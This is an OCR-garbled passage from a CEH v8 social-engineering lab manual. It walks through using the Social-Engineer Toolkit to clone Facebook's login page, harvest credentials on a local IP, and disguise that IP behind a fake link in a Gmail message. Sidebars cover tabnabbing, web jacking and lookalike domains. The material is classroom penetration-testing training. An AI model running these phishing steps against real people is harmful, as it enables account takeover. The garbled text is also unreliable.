open, when the user clicks
die link, die victim w ill be
presented with a “ Please
wait while the page loads” .
W hen the victim switches
tabs because he/she is
multi-tasking, die website
detects that a different tab
is present and rewrites die
webpage to a website you
specify. The victim clicks
back on the tab after a
period o f time and diinks
diey were signed out o f
their email program or their
business application and
types the credentials in.
W hen the credentials are
inserts, diey are harvested
and the user is redirected
back to the original
website.


a p p lic a t i o n s t h a t i t

can u t i l i z e

w ith in th e a tta c k .

The second m ethod w i l l c o m p le te ly c lo n e a w e b s ite o f y o u r c h o o s in g
same web a p p lic a t i o n you w e re a t te m p t in g t o c lo n e .
The t h i r d m ethod a llo w s you t o im p o r t y o u r own w e b s ite , n o te t h a t you
s h o u ld o n ly have an in d e x . h tm l when u s in g th e im p o r t w e b s ite
f u n c tio n a lit y .
2 ) S i t e C lo n e r
3) Custom Im p o rt

_

1 9 9 ) R e tu rn t o W e b A ta c k Menu

J[jL S ‫ ־‬br
ir

I

r3

t - 1 C r e d e n tia l h a r v e s t e r w i l t a llo w you t o u t i l i z e

set

‫ן‬

/

.

* |

'

^

t h e c lo n e c a p a b i l i t i e s w i t h in

J

[-1 t o h a r v e s t c r e d e n t ia ls o r p a ra m e te rs fro m a w e b s ite as w e ll as p ie c e them in
*
to a re p o rt
[-1 T h is o p t io n i s used f o r w h a t IP th e s e r v e r w i l l POST t o .
[ - J I f y o u 'r e u s in g an e x t e r n a l I P , use y o u r e x t e r n a l IP f o r t h i s

:

> IP address for the POST back in Harvester/Tabnabbina:110. 0.0 . 1s|
F IG U R E 3.7: Providing IP address in Harvester/Tabnabbing

Now, you will be prompted for a URL to be cloned, type the desired
URL for E n t e r t h e u rl t o c l o n e and press E n te r . 1 1 tins example, we
1
have used w w w . f a c e b o o k . c o m . Tins will nntiate the cloning of the
specified website.



*

T e r m in a l

File Edit View Term inal Help
same web a p p lic a t i o n you w e re a t te m p t in g t o c l o n e T ^ ^ ^ ^ ^ ^ ^

C Q t 1 e web jacking attack
1
method will create a
website clone and present
the victim with a link
stating that the website has
moved. This is a new
feature to version 0.7.

The t h i r d m ethod a llo w s you t o im p o r t - y m jr own w e b s it e , n o te t h a t you
s h o u ld o n ly have an in d e x . h tm l when u s in g t h e im p o r t w e b s ite
f u n c tio n a lit y .
2 ) S i t e C lo n e r
3) Custom Im p o rt

[•]

: w e b a tta c k >2
—
C r e d e n tia l h a r v e s t e r w i l l a llo w you t o u t i l i z e

Jr> h a r v e s t
[ ‫ ] ־‬to

1 T JT
o r p a ra m e te rs

t h e c lo n e c a p a b i l i t i e s w i t h i r

c r e d e n t ia ls
f rom a w e b s ite as w e ll a s p la c e them i r
to a re p o rt I ^
■ %
I
%
■
I V
J
1
a
[-] T h is o p t io n i s used f o r | hha t IP th e s e r v e r w i l l POST t o . V ^
[■ ] I f y o u 'r e u s in g an e x t e r n a l IP , use y o u r e x t e r n a l IP f o r t h i s
s e t : w e b a tta c k > IP a d d re s s f o r t h e POST back i n H a r v e s te r /T a b n a b b in g :1 0 .0 .0 .1 5
[ • ] SET s u p p o rts b o th HTTP and HTTPS
[ - ] Exam ple: h t t p : //w w w . t h i s i s a f a k e s i t e . com____________
; e t : w e b a tta c k > E n te r th e u r l t o c lo n e :Rvww. fa c e b o o k . com !

M

3r A

F IG U R E 3.8: Providing U R L to be cloned

10. Alter cloning is completed, the highlighted message, as shown 111 die
following screenshot, will appear on the T e r m in a l screen ot S E T . Press
E n te r to continue.
11. It will start Credential Harvester.
1333I f you ’re doing a
penetration test, register a
name that’s similar to the
victim, for Gm ail you could
do gmail.com (notice the
1), something similar diat
can mistake the user into
thinking it’s die legitimate

s e t : w e b a tta c k >2
[-1 C r e d e n tia l h a r v e s t e r w i l l a llo w you t o u t i l i z e

51

th e c lo n e c a p a b i l i t i e s w i t h i n

SET
[ - ] t o h a r v e s t c r e d e n t ia ls o r p a ra m e te rs fro m a w e b s ite as w e ll as p la c e them i n
to a re p o rt
[ - ] T h is o p t io n i s used f o r w h a t IP th e s e r v e r w i l l POST t o .
t - J I f y o u 'r e u s in g an e x t e r n a l I P , use y o u r e x t e r n a l IP f o r t h i s
s e t : w e b a tta c k > IP a d d re s s f o r th e POST back i n H a rv e s te r /T a b n a b b in g :1 0 .0 .0 .1 5
{ - ] SET s u p p o rts b o th HTTP and HTTPS
I - ] Exam ple: h t t p : / / w w w . t h is i s a f a k e s it e . c o m
I
s e t : w e b a tta c k > E n te r t h e u r l t o c lo n e : w w w .fa cebook.com

■

b

[*]
[* j

‫—ך‬

.

C lo n in g th e w e b s ite : h t t p s : / / l o g in . f a c e b o o k . c o m / lo g i n . p h p
T h is c o u ld ta k e
lit t le b it...
1
I J

a

Trie b e » « v Ttoaie fteu ■tfm.k i J

P re s s < r e t u r i

fokc

11

f i e l d s a r e a v a i la b le . R e g a rd le s s , K h i
[ ! ] I have read th e above message.

-‫י‬

,

POSTs on a w e b s ite .

t o c o n tin u e

F IG U R E 3.9: S E T Website Cloning

12. Leave the Credential Harvester Attack to fetch information from the
victim’s machine.




* Terminal
File Edit View Terminal Help
m
When you hover over
the link, die U R L will be
presented with the real
URL, not the attacker’s
machine. So for example if
you’re cloning gmail.com,
the U R L when hovered
over it would be gmail.com.
When the user clicks the
moved link, Gmail opens
and then is quickly replaced
with your malicious
Webserver. Remember you
can change the timing of
the webjacking attack in die
config/set_config flags.

[-] Cred en tial harvester w i l l allow you to u t i l iz e the clone c a p a b ilit ie s w ith in

SE
T

[-] to harvest cred e n tia ls or parameters from a website as w e ll as place them in
to a report
——
[■] This option i s used fo r what IP the se rv e r w i l l POST to . _ * a * * '
[-] I f you 're using an extern al IP , use your external IP fo r th is
s e t :webattack> IP address fo r the POST back in H a r v e s t e r / T a b n a b b in g :lf^ ^ ^ ^ ^
[-] SET supports both HTTP and HTTPS
[-1 Example: http://w w w .thisisafakesite.com
s e t :webattack> Enter the u r l to clo n e :www.facebook.com
[* ] Cloning the w ebsite: https://login.facebook.com /login.php
[*j This could take a l i t t l e b i t . . .
The beat way to use t h is a t t a c k i » i f
f ie ld s f t r g ava ila b le . R e jr d le s s . ■hi
l ! ] I have read the above message.

Press

sername and password torm
ftp tu res al POSTs A a webs

to continue

‫ ] ׳‬Social-Engineer T o o lk it Cred en tial Harvester A ttack
, j Cred en tial Harvester i s running on port 80
■ Information w i l l be displayed to you as i t a rriv e s below:
]

F IG U R E 3.10: SET Credential Harvester Attack

13. N o w , y o u h a v e to s e n d th e IP a d d r e s s o f y o u r B a c k T r a c k m a c h in e to a
v ic tim a n d tric k h im o r h e r to c l i c k t o b r o w s e th e I P a d d re s s .
14. F o r tin s d e m o , la u n c h y o u r w e b b r o w s e r 111 th e B a c k T r a c k m a c h in e ;
la u n c h y o u r fa v o rite e m a il se rv ic e . 1 1 1 th is e x a m p le w e h a v e u s e d
w w w .g m a i l.c o m . L o g in to y o u r g m a il a c c o u n t a n d c o m p o s e a n em ail.

0=5! Most of the time they
won’t even notice the IP
but it’s just another way to
ensure it goes on without a
hitch. Now that the victim
enters the username and
password in die fields, you
will notice that we can
intercept the credentials
now.

F IG U R E 3.11: Composing email in Gmail

15. P la c e th e c u r s o r 111 th e b o d y o f t 1 e e m a il w h e r e y o u w is h to p la c e th e
fa k e U R L . T h e n , clic k th e L in k


CO

ic o n .



‫ א‬Compose Mail — ‫־‬
«
9 • >flma1l.com * Gmail • Mozilla Firetox
)
Ejle Edit yiew H to flook marks Ipols Help
is ry

S' ‫^ן‬

f http‫״‬
i

google.com/nîl,

T C | 121▼ Google

Q,

|BackTrack Lnux Hotfe nsiwe Security |lExploit‫־‬
DB Âircrack-ng J^SomaFM
Gmail

Documents

Calendar

More •

G 0 v ‫׳‬g le

0
D
iscard

°
Inbox
SUrrwJ
Important
Sert Mail
Drafts ( )
2

-

Lab«h‫־‬
»

+ Share

o

Dr f autosaveti at 10:4a A M ( minutes ago)
at
0

j@yahoo.com,

I

Add Cc Add Bcc
Su bject

@TOI F -Party Pict r s
ue

A c an
tta h o

►C rls
ice

‫ ־‬B

I

y

T ‫ ־‬rT * A ‫ ־‬T ‫[ © ־‬oo|t= IE •5 i* 5

‫יי‬s *

^

1% • Plain T
oxt

chock s o l n ■
piig‫״‬

H
oilo Sam.
PI»4m» c i k t i l n l view U * w # k »11d ( t t p c ure* a TGIF wflh thw cmMxMim*
l c h s ik o
>♦ » » t
vry i t
t
Regards.

m.

Search chat or SU'

9
‫«י‬

F IG U R E 3.12: Linking Fake U R L to Actual U RL

16. 111 th e E d it L in k w in d o w , firs t ty p e d ie a c tu a l a d d re s s 111 th e W e b
a d d r e s s fie ld u n d e r th e L in k t o o p ti o n a n d th e n ty p e d ie fa k e U R L 111
d ie T e x t t o d i s p l a y h e ld . 111 th is e x a m p le , th e w e b a d d re s s w e h a v e
u s e d is h tt p :/ / 1 0 .0 .0 .1 5 a n d te x t to d is p la y is
w w w .f a c e b o o k .c o m / R in i TG IF. C lic k OK
‫־י‬
‫׳‬

‫ א‬Compose Mail ‫) ן . ■■■ < » ־‬g)gmail.com - Gmail • Mozilla Firetox
■« ■•
■

tile Edit yiew History flookmarks !pols Help
IMC
Compose Mail *

3 !5 ‫■ ״‬
|BackTrack Lnux
»Rlni

Search

rap‫• ־‬

▼ © I f l r Google

googie.com

ensiwe Security ||Fxploit‫־‬
DB
Images

Maps

Play

Q
.

Âircrack-ng j^r
>omaFM

YouTube

G o .)g Ie
Dr f eutosaved at 10:45 A M ( minutes ago)
at
0

Inbox
Starred
Important
Sent Mai
Drafts ( )
2

Edit Link

Crls
ice

Ur* t .
o

X

Toxt t a e i y L w ( facebook com/Rini TG1f ] Q
o ipa:
V

JunkE-mal

To what URL should this link go?

0 Web address

|wtp0.0.15 10‫ | ׳־‬Q
/

C Email ***‫יי•־‬

Th > (‫יז‬IK*
I 1|
Not » w h ttoput I theboxT rm f t* imgeant et o fat youw n t I k t (
ure r a
n
hd *■
h *b
ar o n o A
s a cheroine m t tbe u e u . Then ceoy 1‫ ־‬ate addr s *romt ebox h y u b o s r s
cr
ot
sfl)
e
es
h
o r rwe'
a r s Q r and p t oi140t obox aoov•
dd o o o
ot t
n

|

OK

|

Cancel

F IG U R E 3.13: Edit Link window

17. T h e fa k e U R L s h o u ld a p p e a r 111 th e e m a il b o d y , as s h o w n 111 th e
fo llo w in g s c r e e n s h o t.




Ejle Edit

‫ א‬Compose Mail ‫—» ־‬
......... • (g>gm 1l.com * Gmail • Mozilla Firefox
a
H to flook marks Ipols Help
is ry

gBackTrack Linux |*|Offensive Security |[JjExploit-DB ^Aircrack-ng jgjjSomaFM

G 0 v ‫׳‬g le
Saved

c a The Credential
Harvester Method will
utilize web cloning of a
website that has a username
and password field and
harvest all die information
posted to the website.

D
iscard

To

Labels•‫־‬
»

Dr f autnsaved at 11:01 A M ( minutes ago)
at
0

0 ‫־‬

B

@yahoo com,

Inbox

Add Cc Add Bcc

SUrred
Important
Serf Mail
Drafts ( )
2

Subjed

©TGIF- Party Pict r s
ue
Attach a 1 ‫ת‬
0

I

Sf ‫ ־‬B

►C rls
ice

U T - »T - A, • T - © oo | - IE 3

is H

«

=3 ^

, piain roxt

chock s o l n ■
piig'

Hello Sam.
t < 1. l l TfilFjl vtw I *
: m Rn
o l‫ ״‬I -

Pt-*M» c i k t i Ifk www
l c h s lij

pa l picture a TGIF with th* ceMvttlM
ry
t

Koqaroe.

Sa h1
e rc

9
*

F IG U R E 3.14: Adding Fake U R L in the email content

18. T o v e rity th a t th e fa k e U R L is lin k e d to d ie a c tu a l U R L , c lick th e fa k e
U R L a n d it w ill d is p la y th e a c tu a l U R L as G o t o lin k : w ith th e a c tu a l
U R L . S e n d th e e m a il to th e in t e n d e d u se r.
•
‫־‬

x Co m p o s e Mail -

•• •

ipgmml.com - Gmail • Mozilla Firefox

File £d 1 yie* History gookmarks !0015 ftelp
t

M Compose Mail -

V

5r'

rg| |>|t r.o le Q £
cin
,

oogle.com

A Track Linux |£Offensive Security |lExploit-DB J^Aircrack-ng fefiSomaFM
ages

Maps

Play

YouTube

G o u g le

+ Share
D
iscard

Labels»

D a t autosaved at 11 0 A M ( minutes ago)
rf
:1
0

FI

0•

@yahoo.c

L i some cases when
you’re performing an
advanced social-engineer
attack you may want to
register a domain and buy
an SSL cert that makes die
attack more believable. You
can incorporate SSL based
attacks with SET. You will
need to turn the
W EBA TTA C K _SSL to
ON. If you want to use
self-signed certificates you
can as well however there
will be an “ untrusted”
warning when a victim goes
to your website
m

Inbox
Starred
Important
Serf M s
Drafts ( )
2
Ci c e
rls

Add Cc Add Bcc
Sucject

@TGi F - Party P
ictures
Attach a no

‫מ‬

■ B

I

U

T • tT * A ‫© • ז ־‬

M

jE IE •= 1 ‫ ׳‬M

E

=

1

/x « Plain Text

Check Spelling-

JunkE-mal
Please c i k t i l n wwv.facebook.CQfr!<Rini TGIF 10 view the wee*end party p c u e a TGIF with the c l b i i s
l c h s ik
itrs t
eerte
rpj c c
cgrf

| to ln. htlp:f/10.0.0.1y -Chanoo Remove y |
Go
ik

F IG U R E 3.15: Actual U R L linked to Fake U RL

19. W h e n th e v ic tim c lick s th e U R L , h e o r sh e w ill b e p r e s e n te d w ith a
re p lic a o f F a c e b o o k .c o m
2 0. T h e v ic tim w ill b e e n tic e d to e n te r 111s o r h e r u s e r n a m e a n d p a s s w o r d
in to th e f o r m field s as it a p p e a rs to b e a g e n u in e w e b s ite . W h e n th e
v ic tim e n te r s th e U s e r n a m e a n d P a s s w o r d a n d click s L o g In, it d o e s
n o t a llo w lo g g in g in ; in s te a d , it r e d ire c ts to th e le g itim a te F a c e b o o k
lo g in p a g e . O b s e r v e th e U R L in th e b ro w s e r.




m
H ie multi-attack
vector allows you to turn
on and off different vectors
and combine the attacks all
into one specific webpage.
So when the user clicks the
link he will be targeted by
each of the attack vectors
you specify. One tiling to
note with the attack vector
is you can’t utilize
Tabnabbing, Cred
Harvester, or Web Jacking
with the Man Left in the
Middle attack.

facebook
Sign Up

Connect and share with the people in your Ife.

Tarpbook 1ogin
(m or t*h n
art
o *:
Passw
ord:

---| 1Keepme lowed in

o Sigau for taceto k
r
p
oo
Forgoty u o s *v rd
o r ss o ?

f nit )
cgs‫! ־‬kwo fflOj®Oge =33and Rrtugjes (t
=

F3Lcb5x S 2012

Moble ‫־‬F n F i n s ‫־‬Eodces Peo l ‫־‬Poqcs A c u Crca* er Ad C
id red
pe
fct
reate a Page ‫־‬
Developers Careers ‫־‬P i a y C a s s Terre
rvc ote

Q log1n >
|h c«book

m

1<‫ ־‬H C S|hnp3:;;www.face&oolccom/10gm.php|
| ^ Do you want Google Chrome to save your password?

1
|Save password

Never for this site

•
<

facebook
Skjii Up

C arM .1 and slur** with the p ip 1 your lit*.
u H
tM k* 1
1

Facebook Login

The multi attack
vector utilizes each
combination of attacks and
allows the user to choose
the method for the attack.
Once you select one of the
attacks, it will be added to
your attack profile to be
used to stage die attack
vector. When you’re
finished be sure to select
the I ’m finished' option.
m

Em or Phone;
ai

|

Password:
□ Keepme l
oggedm

c Sum upforTaccbook
»
Fo g t r u D
r o o t »s*crcP

C g h(U VMI
n la S]

Ftctboot e

2012

*In
-JI

O
v/u & j< D «
A B£

[xa'd Fwtu«je» OwO

M odI ‫ ׳‬h n i n n c ‫ ׳‬B t g c * i d - * d a i c ■«pl« Hg*c - f c t
Acu

j *1 A
‫ ׳‬d
ar

r‫ ־‬ab(F n )
arK ra ce

C
raaca a P*g - ' / cp«rc - ar* r - * v c 4 ‫ _! ׳‬o «c •! r *
« L«*
L *c !ray
ok *r

m
FIG U R E 3.16: Fake and Legitimate Facebook login page

2 1 . A s s o o n th e v ic tim ty p e s 111 th e e m a il a d d re s s a n d p a s s w o rd , th e S E T
T e r m in a l 111 B a c k T r a c k f e tc h e s th e ty p e d u s e r n a m e a n d p a s s w o rd ,
w h ic h c a n b e u s e d b y a n a tta c k e r to g a m u n a u th o r iz e d a c c e ss to th e
v ic tim ’s a c c o u n t.




* v x Terminal

[ ] Social-Engineer Toolkit Credential Harvester Attack.
*
[* j Credential Harvester is running on port 80
[ j Information will be displayed to you as i* ‫ ץ ~ - י‬hrl"“‫— ־‬
*
-‫״יי‬
10.0.0.2 - - [26/Sep/2012 11:10:41] “
GET / HTTP/1.1“ 200 [* ] WE GOT A HIT! P rin tin g the output:

Social Engineer
Toolkit Mass E-Mailer
m

There are two options on
the mass e-mailer; the first
would be to send an email
to one individual person.
The second option will
allow you to import a list
and send it to as many
people as you want within
that list.

PARAM:
PARAM:
PARAM:
PARAM:
PARAM:
PARAM:
PARAM
PARAM
PARAM
PARAM

lsd=AVqgmkGh
return session=0
legacy return=l
display‫־‬
session key only=0
trynu!n=l
charset test=€,
timezone=-330
lgnrnd=224034 ArY/U

‫׳‬l €
f,

0OSSI
POSSIBfe p J ^ n m | F K L D F * % ) :

PARAM: default persistent=‫־‬
Q
POSSIBLE USERNAME FIELD FOUND: lo«.n=Log+In
[ ‫ ] י‬WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

F IG U R E 3.17: SET found Username and Password

2 2. P re s s C TR L +C to g e n e ra te a r e p o r t t o r th is a tta c k p e rf o rm e d .

/v v x Terminal

m
The multi-attack will
add a combination of
attacks through the web
attack menu. For example
you can utilize the Java
Applet, Metasploit
Browser, Credential
Harvester/Tabnabbing,
and the Man Left in the
Middle attack all at once to
see which is successful.

PARAM:
PARAM:
PARAM:
PARAM:
PARAM:
PARAM:
PARAM:
PARAM:
PARAM:
PARAM:

lsd=AVqgmkGh
return session=0
legacy return=l
display‫־‬
session key only=0
trynu1 =l
»
charset t e s t = € , / K , l €
f,
tiraezone=-540
Ignrnd=224034 ArYA
lgnjs=n

POSSIBLE USERNAME FIELD FOUND: emai l ‫•' ׳ — ־‬
POSSIBLE PASSWORD FIELD FOUND: pass=test

PARAM: default persistent=0
POSSIBLE USERNAME FIELD FOUND: l 0 gin=L0 g+In
[* ] WHEN YOU'RE FIN ISHED -HIT C0N1R0L-C TO GENERATE A REPOftf.
C

L

.

I

x

'C[*] ftle exported to r
Jwkts/20®-09-fc 1
ts/20K-09-26 15::49:15.S4ftl5.lf»L for

H IE * r
RasnM* w i W I V

W l WA V f I X

your

-‫ך‬

[ ] File in XML format exported t | reports/2012-09-26 15:49:15.5464l^.x
•
(
j reading pleasure...
r
Press <retur1 to continue
F IG U R E 3.18: Generating Reports through SET

L a b A n a ly s is
A n a ly ze a n d d o c u m e n t d ie resu lts re la te d to d ie la b exercise.




T o o l/U tility

I n f o r m a tio n C o ll e c te d / O b j e c ti v e s A c h ie v e d
P A R A M : ls d = A V q g m k G 1 1
P A R A M : r e t u r n _ s e s s io n = 0
P A R A M : le g a c y _ re tu r n = 1
P A R A M : d is p la y s
P A R A M : s e s s io n _ k e y _ o n ly = 0

S o c ia l

P A R A M : tr v n u m = 1

E n g in e e r in g

P A R A M : c h a r s e t_ te s t= € ,',€ ,',

T o o lk it

P A R A M : tim e z o n e = - 5 4 0
P A R A M : lg n r n d = 2 2 4 0 3 4 _ A rY A
P A R A M : lg n j s = n
e m a 11 = s a m c h o a n g @ y a h o o .c o m
p a s s = te s t@ 1 2 3

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R

R E L A T E D

T O

T H I S

I F

Y O U

H A V E

Q U E S T I O N S

L A B .

Q u e s t io n s
1.

E v a lu a te e a c h o f th e fo llo w in g P a ro s p ro x y o p tio n s:
a.

T ra p R e q u e st

b.

T ra p R e sp o n se

c.

C o n tin u e b u tto n

d.

D r o p b u tto n

I n te r n e t C o n n e c tio n R e q u ire d
0 Y es

□ No

P la tfo rm S u p p o rte d
0


C la s s ro o m

□ !L a b s


Ceh v8 labs module 09 social engineering

More Related Content

What's hot (8)

Similar to Ceh v8 labs module 09 social engineering (20)

Recently uploaded (20)

Ceh v8 labs module 09 social engineering